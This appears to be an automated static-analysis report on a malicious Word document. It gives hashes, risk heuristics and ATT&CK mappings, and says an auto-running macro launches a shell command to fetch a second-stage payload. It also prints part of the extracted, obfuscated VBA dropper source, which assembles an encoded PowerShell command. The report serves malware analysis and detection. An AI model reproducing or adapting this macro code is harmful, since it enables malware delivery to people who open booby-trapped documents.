Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9b8113083f7b11c…

MALICIOUS

Office (OLE)

86.0 KB Created: 2018-06-15 19:27:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: bb4c76ee8ac2cb0e41711083605e1dda SHA-1: 9e5a82850f76bfda1c25f555c4d8765962d57d12 SHA-256: f9b8113083f7b11c91c1dce9bfdc64f50712d38ae24cc18fbda90182ca15c00b
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is an Office document with VBA macros. A high-severity heuristic indicates that these macros execute a shell command via the Document_open auto-execution function. This strongly suggests the document is designed to download and execute a secondary payload, a common technique for malware delivery.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9861 bytes
SHA-256: 5294f1abac39f197298c8c4a3d231cca85bf9f2ccd620f0f892f59d35a108739
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
Aq                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL  . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQFY)
MHWpXS = (10842 * Sgn(qDYtR) / 32608 / wjwuql * SLwuii + ChrW(LuURz) / QCqBYj * CInt(AhjOM))
OotFd = 79558 + AXZfZr
dYatnNQ = "3r32s55J5" + "4r48G43x44~42V" + "43s107" + "s38J42s40x106r" + "38G18J11" + "2G61s22s40s1" + "06{5J45r"
ikfjh = jnJiF
ucCMO = Rnd(vdpLrd)
DKarzY = (79558 * Sgn(jVZbm) / 89984 / ViMQta * vFfHvY + ChrW(EVazqO) / wCqYj * CInt(jMLEzn))
bsiIEb = 34384 + ZtpwVG
sJwmd = "49N49J53<127" + "s106V10" + "6G36<
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.